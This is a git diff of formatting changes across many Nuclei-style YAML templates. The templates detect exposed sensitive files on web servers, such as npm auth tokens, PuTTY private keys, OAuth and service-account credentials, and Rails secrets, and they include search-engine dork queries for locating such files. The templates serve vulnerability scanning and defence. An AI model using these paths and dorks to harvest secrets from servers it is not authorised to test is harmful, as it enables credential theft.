matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/joomla-file-listing.yaml b/http/exposures/files/joomla-file-listing.yaml index b778dba502..2c1afa32b9 100644 --- a/http/exposures/files/joomla-file-listing.yaml +++ b/http/exposures/files/joomla-file-listing.yaml @@ -5,16 +5,16 @@ info: author: iampritam severity: medium description: A Joomla! database directory /libraries/joomla/database/ was found exposed and has directory indexing enabled. + remediation: Disable directory indexing on the /libraries/joomla/database/ directory or remove the content from the web root. If the databases can be download, rotate any credentials contained in the databases. reference: - https://www.exploit-db.com/ghdb/6377 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-548 - remediation: Disable directory indexing on the /libraries/joomla/database/ directory or remove the content from the web root. If the databases can be download, rotate any credentials contained in the databases. - tags: exposure,joomla,listing,database,edb metadata: max-request: 1 + tags: exposure,joomla,listing,database,edb http: - method: GET diff --git a/http/exposures/files/jsapi-ticket-json.yaml b/http/exposures/files/jsapi-ticket-json.yaml index 89553ea9eb..ecc3f5e3fe 100644 --- a/http/exposures/files/jsapi-ticket-json.yaml +++ b/http/exposures/files/jsapi-ticket-json.yaml @@ -6,8 +6,8 @@ info: severity: low reference: https://www.exploit-db.com/ghdb/6070 metadata: - max-request: 1 verified: true + max-request: 1 google-query: intitle:"index of" "jsapi_ticket.json" tags: exposure,jsapi,files diff --git a/http/exposures/files/kubernetes-etcd-keys.yaml b/http/exposures/files/kubernetes-etcd-keys.yaml index 647d91cf82..99dc7417be 100644 --- a/http/exposures/files/kubernetes-etcd-keys.yaml +++ b/http/exposures/files/kubernetes-etcd-keys.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: - max-request: 1 verified: true + max-request: 1 github-query: filename:apiserver-etcd-client.key tags: files,exposure,kubernetes,k8s diff --git a/http/exposures/files/lazy-file.yaml b/http/exposures/files/lazy-file.yaml index 052f1daaff..89f61a0086 100644 --- a/http/exposures/files/lazy-file.yaml +++ b/http/exposures/files/lazy-file.yaml @@ -4,9 +4,9 @@ info: name: Lazy File Manager author: amsda severity: medium - tags: exposure metadata: max-request: 1 + tags: exposure http: - method: GET @@ -21,4 +21,4 @@ http: - type: word words: - - Lazy File Manager \ No newline at end of file + - Lazy File Manager diff --git a/http/exposures/files/npm-anonymous-cli.yaml b/http/exposures/files/npm-anonymous-cli.yaml index c637901c1e..380c5694cb 100644 --- a/http/exposures/files/npm-anonymous-cli.yaml +++ b/http/exposures/files/npm-anonymous-cli.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"anonymous-cli-metrics.json" tags: exposure,npm,config,files @@ -19,6 +19,7 @@ http: - '{{BaseURL}}/anonymous-cli-metrics.json' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/npm-cli-metrics-json.yaml b/http/exposures/files/npm-cli-metrics-json.yaml index f869869d4c..5c32b4a4f3 100644 --- a/http/exposures/files/npm-cli-metrics-json.yaml +++ b/http/exposures/files/npm-cli-metrics-json.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: low metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"anonymous-cli-metrics.json" tags: npm,devops,exposure,files @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/.npm/anonymous-cli-metrics.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/npm-shrinkwrap-exposure.yaml b/http/exposures/files/npm-shrinkwrap-exposure.yaml index d096c2c2f9..e147529936 100644 --- a/http/exposures/files/npm-shrinkwrap-exposure.yaml +++ b/http/exposures/files/npm-shrinkwrap-exposure.yaml @@ -34,4 +34,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/exposures/files/npmrc-authtoken.yaml b/http/exposures/files/npmrc-authtoken.yaml index 72486c8d72..18790a17e4 100644 --- a/http/exposures/files/npmrc-authtoken.yaml +++ b/http/exposures/files/npmrc-authtoken.yaml @@ -8,8 +8,8 @@ info: - https://docs.npmjs.com/cli/v8/configuring-npm/npmrc - https://docs.github.com/en/packages/working-with-a-github-packages-registry/working-with-the-npm-registry metadata: - max-request: 1 verified: true + max-request: 1 google-query: intitle:"index of" ".npmrc" tags: npm,exposure diff --git a/http/exposures/files/nuget-package-config.yaml b/http/exposures/files/nuget-package-config.yaml index f3a15067d8..214ccbf0e5 100644 --- a/http/exposures/files/nuget-package-config.yaml +++ b/http/exposures/files/nuget-package-config.yaml @@ -8,8 +8,8 @@ info: - https://learn.microsoft.com/en-us/nuget/reference/packages-config - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"packages.config" tags: exposure,sass,devops,cicd,nuget,files @@ -20,6 +20,7 @@ http: - '{{BaseURL}}/.nuget/packages.config' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/oauth-credentials-json.yaml b/http/exposures/files/oauth-credentials-json.yaml index 1bc6b7e6e6..9c9ed6fd43 100644 --- a/http/exposures/files/oauth-credentials-json.yaml +++ b/http/exposures/files/oauth-credentials-json.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: low metadata: - max-request: 1 verified: true + max-request: 1 google-query: intitle:"index of" "oauth-credentials.json" tags: exposure,oauth,files diff --git a/http/exposures/files/openstack-user-secrets.yaml b/http/exposures/files/openstack-user-secrets.yaml index 33c1e87c11..688239ea00 100644 --- a/http/exposures/files/openstack-user-secrets.yaml +++ b/http/exposures/files/openstack-user-secrets.yaml @@ -7,8 +7,8 @@ info: reference: - https://docs.openstack.org/project-deploy-guide/openstack-ansible/stein/configure.html metadata: - max-request: 2 verified: true + max-request: 2 github-query: filename:user_secrets.yml tags: openstack,config,exposure,files @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/user_secrets.yml.old" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/oracle-test-cgi.yaml b/http/exposures/files/oracle-test-cgi.yaml index 7d90174902..d2607d17b7 100644 --- a/http/exposures/files/oracle-test-cgi.yaml +++ b/http/exposures/files/oracle-test-cgi.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Oracle Application Server" tags: oracle,exposure diff --git a/http/exposures/files/pantheon-upstream.yaml b/http/exposures/files/pantheon-upstream.yaml index e2e1575b84..3486621c68 100644 --- a/http/exposures/files/pantheon-upstream.yaml +++ b/http/exposures/files/pantheon-upstream.yaml @@ -8,8 +8,8 @@ info: reference: - https://pantheon.io/docs/pantheon-yml metadata: - max-request: 1 verified: true + max-request: 1 google-query: intitle:"index of" "pantheon.upstream.yml" tags: exposure,devops,patheon,config,files diff --git a/http/exposures/files/php-ini.yaml b/http/exposures/files/php-ini.yaml index e90872f3eb..16e7b1233b 100644 --- a/http/exposures/files/php-ini.yaml +++ b/http/exposures/files/php-ini.yaml @@ -6,8 +6,8 @@ info: severity: low reference: https://www.php.net/manual/en/configuration.file.php metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: php.ini tags: config,exposure,files @@ -18,7 +18,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposures/files/php-user-ini-disclosure.yaml b/http/exposures/files/php-user-ini-disclosure.yaml index 2113122661..3e0031988f 100644 --- a/http/exposures/files/php-user-ini-disclosure.yaml +++ b/http/exposures/files/php-user-ini-disclosure.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/php-user-ini-disclosure.json - tags: exposure,config,files metadata: max-request: 2 + tags: exposure,config,files http: - method: GET diff --git a/http/exposures/files/phpunit-result-cache-exposure.yaml b/http/exposures/files/phpunit-result-cache-exposure.yaml index 1f76197543..92beddbaff 100644 --- a/http/exposures/files/phpunit-result-cache-exposure.yaml +++ b/http/exposures/files/phpunit-result-cache-exposure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: ".phpunit.result.cache" tags: config,exposure,devops,files diff --git a/http/exposures/files/phpunit.yaml b/http/exposures/files/phpunit.yaml index f355c46770..699e41c859 100644 --- a/http/exposures/files/phpunit.yaml +++ b/http/exposures/files/phpunit.yaml @@ -5,14 +5,14 @@ info: author: pikpikcu severity: info description: Phpunit.xml was created by Romain Bourdon for the development of WampServer 3.1. Phpunit.xml is packaged with WampServer 3.1.9 and XAMPP 5.6.40. + remediation: Ensure the approved and updated version is installed. reference: - https://www.wampserver.com/en/ classification: cwe-id: CWE-200 - remediation: Ensure the approved and updated version is installed. - tags: exposure,files metadata: max-request: 1 + tags: exposure,files http: - method: GET diff --git a/http/exposures/files/pipeline-configuration.yaml b/http/exposures/files/pipeline-configuration.yaml index 8b1c4e871c..9e5defe446 100644 --- a/http/exposures/files/pipeline-configuration.yaml +++ b/http/exposures/files/pipeline-configuration.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"pipeline.yaml" tags: devops,exposure,cicd,files diff --git a/http/exposures/files/pipfile-lock.yaml b/http/exposures/files/pipfile-lock.yaml index ee70d494e4..49087c38e8 100644 --- a/http/exposures/files/pipfile-lock.yaml +++ b/http/exposures/files/pipfile-lock.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Pipfile" tags: exposure,pip,devops,cicd,files diff --git a/http/exposures/files/pnpm-lock.yaml b/http/exposures/files/pnpm-lock.yaml index 67486109cd..c2ecc49db1 100644 --- a/http/exposures/files/pnpm-lock.yaml +++ b/http/exposures/files/pnpm-lock.yaml @@ -9,8 +9,8 @@ info: reference: - https://pnpm.io/cli/install#tldr metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"pnpm-lock.yaml" tags: exposure,files,node,npm,pnpm diff --git a/http/exposures/files/putty-private-key-disclosure.yaml b/http/exposures/files/putty-private-key-disclosure.yaml index c6b11940f6..1fbf5c671a 100644 --- a/http/exposures/files/putty-private-key-disclosure.yaml +++ b/http/exposures/files/putty-private-key-disclosure.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/putty-private-key-disclosure.json metadata: - max-request: 8 verified: true + max-request: 8 github-query: filename:putty.ppk tags: exposure,files @@ -25,6 +25,7 @@ http: - "{{BaseURL}}/.putty/{{Hostname}}.ppk" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/pyproject-disclosure.yaml b/http/exposures/files/pyproject-disclosure.yaml index 56f5582f44..6188db2ed1 100644 --- a/http/exposures/files/pyproject-disclosure.yaml +++ b/http/exposures/files/pyproject-disclosure.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/pyproject-disclosure.json - tags: exposure,files metadata: max-request: 1 + tags: exposure,files http: - method: GET diff --git a/http/exposures/files/rails-secret-token-disclosure.yaml b/http/exposures/files/rails-secret-token-disclosure.yaml index f8028afbb6..9c19936544 100644 --- a/http/exposures/files/rails-secret-token-disclosure.yaml +++ b/http/exposures/files/rails-secret-token-disclosure.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/ruby-on-rails-secret-token-disclosure.json - tags: exposure,files,rails,ruby,token metadata: max-request: 1 + tags: exposure,files,rails,ruby,token http: - method: GET diff --git a/http/exposures/files/reactapp-env-js.yaml b/http/exposures/files/reactapp-env-js.yaml index c419696263..94eb50078e 100644 --- a/http/exposures/files/reactapp-env-js.yaml +++ b/http/exposures/files/reactapp-env-js.yaml @@ -5,8 +5,8 @@ info: author: random-robbie severity: unknown metadata: - max-request: 2 verified: true + max-request: 2 github-query: "REACT_APP_" tags: react,exposure,config,js,javascript diff --git a/http/exposures/files/redmine-config.yaml b/http/exposures/files/redmine-config.yaml index 4a298aa3d1..f7e50ae9ca 100644 --- a/http/exposures/files/redmine-config.yaml +++ b/http/exposures/files/redmine-config.yaml @@ -12,8 +12,8 @@ info: cvss-score: 7.5 cwe-id: CWE-200 metadata: - max-request: 3 verified: true + max-request: 3 google-query: intitle:"index of" configuration.yml tags: exposure,redmine,devops,edb,files @@ -25,6 +25,7 @@ http: - "{{BaseURL}}/redmine/config/configuration.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/redmine-settings.yaml b/http/exposures/files/redmine-settings.yaml index de32c35036..c73aa9b6db 100644 --- a/http/exposures/files/redmine-settings.yaml +++ b/http/exposures/files/redmine-settings.yaml @@ -6,8 +6,8 @@ info: severity: info reference: https://www.exploit-db.com/ghdb/5796 metadata: - max-request: 3 verified: true + max-request: 3 google-query: intitle:"index of" "settings.yml" tags: misconfig,redmine,devops,files,exposure @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/redmine/config/settings.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/routes-ini.yaml b/http/exposures/files/routes-ini.yaml index 2936f86171..68c7a40ab0 100644 --- a/http/exposures/files/routes-ini.yaml +++ b/http/exposures/files/routes-ini.yaml @@ -5,10 +5,10 @@ info: author: geeknik severity: info metadata: - max-request: 15 verified: true - github-query: filename:routes.ini + max-request: 15 google-query: intitle:"index of" "routes.ini" + github-query: filename:routes.ini tags: routes,config,exposure,files http: @@ -31,6 +31,7 @@ http: - "{{BaseURL}}/slr/routes/configs/routes.ini" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/exposures/files/ruby-rail-storage.yaml b/http/exposures/files/ruby-rail-storage.yaml index 14934ee824..35cd780bd0 100644 --- a/http/exposures/files/ruby-rail-storage.yaml +++ b/http/exposures/files/ruby-rail-storage.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: low metadata: - max-request: 4 verified: true + max-request: 4 google-query: intitle:"index of" storage.yml tags: exposure,ruby,devops,files @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/railsapp/config/storage.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/salesforce-credentials.yaml b/http/exposures/files/salesforce-credentials.yaml index 7300d99830..b1dd2e4200 100644 --- a/http/exposures/files/salesforce-credentials.yaml +++ b/http/exposures/files/salesforce-credentials.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - tags: exposure,files,salesforce metadata: max-request: 2 + tags: exposure,files,salesforce http: - method: GET @@ -22,6 +22,7 @@ http: - '{{BaseURL}}/salesforce.js' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/sass-lint.yaml b/http/exposures/files/sass-lint.yaml index 16b2ba2063..290e711fd6 100644 --- a/http/exposures/files/sass-lint.yaml +++ b/http/exposures/files/sass-lint.yaml @@ -7,8 +7,8 @@ info: reference: - https://github.com/sasstools/sass-lint/blob/develop/docs/sass-lint.yml metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"sass-lint.yml" tags: exposure,sass,devops,cicd,files diff --git a/http/exposures/files/secret-token-rb.yaml b/http/exposures/files/secret-token-rb.yaml index 88196399bf..7e297c61f9 100644 --- a/http/exposures/files/secret-token-rb.yaml +++ b/http/exposures/files/secret-token-rb.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: medium metadata: - max-request: 3 verified: true + max-request: 3 google-query: intitle:"index of" "secret_token.rb" tags: redmine,devops,exposure,ruby,files @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/redmine/config/initializers/secret_token.rb" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/secrets-file.yaml b/http/exposures/files/secrets-file.yaml index 05038369d7..96691975fa 100644 --- a/http/exposures/files/secrets-file.yaml +++ b/http/exposures/files/secrets-file.yaml @@ -6,8 +6,8 @@ info: severity: high reference: https://www.exploit-db.com/ghdb/6283 metadata: - max-request: 4 verified: true + max-request: 4 google-query: intitle:"index of" "secrets.yml" tags: cloud,devops,files,exposure,misconfig @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/redmine/config/secrets.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/exposures/files/sendgrid-env.yaml b/http/exposures/files/sendgrid-env.yaml index 401875c8e9..aa84bb6f24 100644 --- a/http/exposures/files/sendgrid-env.yaml +++ b/http/exposures/files/sendgrid-env.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: medium metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"sendgrid.env" tags: exposure,sendgrid,key,api,files diff --git a/http/exposures/files/sensitive-storage-exposure.yaml b/http/exposures/files/sensitive-storage-exposure.yaml index 597e1c54d2..6dd3188db0 100644 --- a/http/exposures/files/sensitive-storage-exposure.yaml +++ b/http/exposures/files/sensitive-storage-exposure.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: expose,listing,config,logs,storage,edb,files,exposure metadata: max-request: 6 + tags: expose,listing,config,logs,storage,edb,files,exposure http: - method: GET @@ -26,6 +26,7 @@ http: - "{{BaseURL}}/elocker_old/storage/" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/service-account-credentials.yaml b/http/exposures/files/service-account-credentials.yaml index 75f36381b7..ce2137d396 100644 --- a/http/exposures/files/service-account-credentials.yaml +++ b/http/exposures/files/service-account-credentials.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: medium metadata: - max-request: 2 verified: true + max-request: 2 google-query: intitle:"index of" "service-Account-Credentials.json" tags: privatekey,exposure,files @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/service-account-credentials.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/shellscripts.yaml b/http/exposures/files/shellscripts.yaml index fb8c02db59..55231f8616 100644 --- a/http/exposures/files/shellscripts.yaml +++ b/http/exposures/files/shellscripts.yaml @@ -4,9 +4,9 @@ info: name: Public shellscripts author: panch0r3d severity: low - tags: bash,exposure,files metadata: max-request: 23 + tags: bash,exposure,files http: - method: GET diff --git a/http/exposures/files/snyk-ignore-file-disclosure.yaml b/http/exposures/files/snyk-ignore-file-disclosure.yaml index 57c63ab7a9..bdafb3d695 100644 --- a/http/exposures/files/snyk-ignore-file-disclosure.yaml +++ b/http/exposures/files/snyk-ignore-file-disclosure.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/snyk-ignore-file-disclosure.json - tags: exposure,files metadata: max-request: 1 + tags: exposure,files http: - method: GET diff --git a/http/exposures/files/socks5-vpn-config.yaml b/http/exposures/files/socks5-vpn-config.yaml index 92ad14ce27..eb39a31de5 100644 --- a/http/exposures/files/socks5-vpn-config.yaml +++ b/http/exposures/files/socks5-vpn-config.yaml @@ -10,8 +10,8 @@ info: - https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E6%83%A0%E5%B0%94%E9%A1%BF/%E6%83%A0%E5%B0%94%E9%A1%BF%20e%E5%9C%B0%E9%80%9A%20config.xml%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="惠尔顿-e地通VPN" tags: esocks5,exposure,misconfig,files,disclosure diff --git a/http/exposures/files/styleci-yml-disclosure.yaml b/http/exposures/files/styleci-yml-disclosure.yaml index d5dab9649d..bfb6e58db5 100644 --- a/http/exposures/files/styleci-yml-disclosure.yaml +++ b/http/exposures/files/styleci-yml-disclosure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: ".styleci.yml" tags: config,exposure,devops,files diff --git a/http/exposures/files/svn-wc-db.yaml b/http/exposures/files/svn-wc-db.yaml index 8f0225baf2..a5c024d3dd 100644 --- a/http/exposures/files/svn-wc-db.yaml +++ b/http/exposures/files/svn-wc-db.yaml @@ -9,8 +9,8 @@ info: - https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/svn_wcdb_scanner.rb - https://infosecwriteups.com/indias-aadhar-card-source-code-disclosure-via-exposed-svn-wc-db-c05519ea7761 metadata: - max-request: 2 verified: true + max-request: 2 google-query: intitle:"index of" "wc.db" tags: msf,exposure,svn,config,files @@ -22,6 +22,7 @@ http: stop-at-first-match: true max-size: 10000 + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/symfony-properties-ini.yaml b/http/exposures/files/symfony-properties-ini.yaml index 828ca2172b..f07b7c29d5 100644 --- a/http/exposures/files/symfony-properties-ini.yaml +++ b/http/exposures/files/symfony-properties-ini.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 2 verified: true + max-request: 2 google-query: intitle:"index of" "properties.ini" tags: symfony,exposure,files @@ -17,6 +17,7 @@ http: - '{{BaseURL}}/config/properties.ini' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/symfony-security.yaml b/http/exposures/files/symfony-security.yaml index 06b348eb78..3df4d06468 100644 --- a/http/exposures/files/symfony-security.yaml +++ b/http/exposures/files/symfony-security.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 3 verified: true + max-request: 3 google-query: intitle:"index of" "security.yml" tags: symfony,devops,exposure,files @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/app/config/security.yml" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/token-info-json.yaml b/http/exposures/files/token-info-json.yaml index fc44cac689..aab81f0430 100644 --- a/http/exposures/files/token-info-json.yaml +++ b/http/exposures/files/token-info-json.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 2 verified: true + max-request: 2 google-query: intitle:"index of" "token_info.json" tags: exposure,files @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/wp-content/plugins/constant-contact-api-old/vendor/constantcontact/constantcontact/test/Json/Auth/token_info.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/token-json.yaml b/http/exposures/files/token-json.yaml index 61f5c714e9..a5db5f1435 100644 --- a/http/exposures/files/token-json.yaml +++ b/http/exposures/files/token-json.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: low metadata: - max-request: 2 verified: true + max-request: 2 google-query: intitle:"index of" "token.json" tags: exposure,cloud,google,devops,files @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/search/token.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/travis-ci-disclosure.yaml b/http/exposures/files/travis-ci-disclosure.yaml index bce2b0c5cf..30e88eb7f2 100644 --- a/http/exposures/files/travis-ci-disclosure.yaml +++ b/http/exposures/files/travis-ci-disclosure.yaml @@ -13,8 +13,8 @@ info: - https://arstechnica.com/information-technology/2021/09/travis-ci-flaw-exposed-secrets-for-thousands-of-open-source-projects/ - https://www.tenable.com/plugins/was/113156 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"travis.yml" tags: exposure,file,config,tenable @@ -25,6 +25,7 @@ http: - '{{BaseURL}}/matomo/.travis.yml' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/uwsgi-ini.yaml b/http/exposures/files/uwsgi-ini.yaml index 74d67a261a..49906afb2e 100644 --- a/http/exposures/files/uwsgi-ini.yaml +++ b/http/exposures/files/uwsgi-ini.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"uwsgi.ini" tags: exposure,uwsgi,files diff --git a/http/exposures/files/vagrantfile-exposure.yaml b/http/exposures/files/vagrantfile-exposure.yaml index 00922896c0..cd2b12cad7 100644 --- a/http/exposures/files/vagrantfile-exposure.yaml +++ b/http/exposures/files/vagrantfile-exposure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: low metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Vagrantfile" tags: config,exposure,vagrant,oss,files diff --git a/http/exposures/files/viminfo-disclosure.yaml b/http/exposures/files/viminfo-disclosure.yaml index c0952ef82d..ff27376534 100644 --- a/http/exposures/files/viminfo-disclosure.yaml +++ b/http/exposures/files/viminfo-disclosure.yaml @@ -9,8 +9,8 @@ info: reference: - https://renenyffenegger.ch/notes/development/vim/editing/viminfo/index metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Viminfo" tags: devops,exposure,viminfo,config diff --git a/http/exposures/files/vscode-sftp.yaml b/http/exposures/files/vscode-sftp.yaml index 242ae64f27..0b2650fa61 100644 --- a/http/exposures/files/vscode-sftp.yaml +++ b/http/exposures/files/vscode-sftp.yaml @@ -7,8 +7,8 @@ info: description: | It discloses sensitive files created by vscode-sftp for VSCode, contains SFTP/SSH server details and credentials. metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: html:"sftp.json" tags: exposure,vscode,sftp,ssh,files @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/.vscode/sftp.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/webpack-mix-js.yaml b/http/exposures/files/webpack-mix-js.yaml index 74be13026b..e7d3c9a683 100644 --- a/http/exposures/files/webpack-mix-js.yaml +++ b/http/exposures/files/webpack-mix-js.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"webpack.mix.js" tags: config,exposure,devops,files diff --git a/http/exposures/files/webpack-sourcemap-disclosure.yaml b/http/exposures/files/webpack-sourcemap-disclosure.yaml index 46b135ab8f..924da39e4f 100644 --- a/http/exposures/files/webpack-sourcemap-disclosure.yaml +++ b/http/exposures/files/webpack-sourcemap-disclosure.yaml @@ -4,9 +4,9 @@ info: name: Webpack Sourcemap Disclosure author: dhiyaneshDk severity: info - tags: exposure,files metadata: max-request: 2 + tags: exposure,files http: - method: GET @@ -33,4 +33,4 @@ http: name: map group: 1 regex: - - "sourceMappingURL=([a-z-~0-9.]+).js.map" \ No newline at end of file + - "sourceMappingURL=([a-z-~0-9.]+).js.map" diff --git a/http/exposures/files/wget-hsts-list-exposure.yaml b/http/exposures/files/wget-hsts-list-exposure.yaml index 614841a926..a79bc63907 100644 --- a/http/exposures/files/wget-hsts-list-exposure.yaml +++ b/http/exposures/files/wget-hsts-list-exposure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:".wget-hsts" tags: devops,exposure,wget,files diff --git a/http/exposures/files/wordpress-readme-file.yaml b/http/exposures/files/wordpress-readme-file.yaml index b43c3b16e9..57d53781be 100644 --- a/http/exposures/files/wordpress-readme-file.yaml +++ b/http/exposures/files/wordpress-readme-file.yaml @@ -5,8 +5,8 @@ info: author: tess severity: info metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.component:"wordpress" tags: exposure,wordpress,wp,readme,files @@ -18,6 +18,7 @@ http: - "{{BaseURL}}/blog/wp/readme.html" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/wp-cli-exposure.yaml b/http/exposures/files/wp-cli-exposure.yaml index 77718f0685..3a8d257a0e 100644 --- a/http/exposures/files/wp-cli-exposure.yaml +++ b/http/exposures/files/wp-cli-exposure.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"wp-cli.yml" tags: config,exposure,wp-cli,files diff --git a/http/exposures/files/ws-ftp-ini.yaml b/http/exposures/files/ws-ftp-ini.yaml index 7be9ebde09..c874de7265 100644 --- a/http/exposures/files/ws-ftp-ini.yaml +++ b/http/exposures/files/ws-ftp-ini.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: low metadata: - max-request: 1 verified: true + max-request: 1 google-query: intitle:"Index of" ws_ftp.ini tags: exposure,ftp,files @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposures/files/xampp-environment-variables.yaml b/http/exposures/files/xampp-environment-variables.yaml index a6018a7544..adaf316096 100644 --- a/http/exposures/files/xampp-environment-variables.yaml +++ b/http/exposures/files/xampp-environment-variables.yaml @@ -4,9 +4,9 @@ info: name: XAMPP Environment Variables Exposure author: melbadry9,DhiyaneshDK severity: low - tags: exposure,xampp,files metadata: max-request: 1 + tags: exposure,xampp,files http: - method: GET diff --git a/http/exposures/files/yarn-lock.yaml b/http/exposures/files/yarn-lock.yaml index f1864ee045..b599511bab 100644 --- a/http/exposures/files/yarn-lock.yaml +++ b/http/exposures/files/yarn-lock.yaml @@ -13,7 +13,6 @@ info: 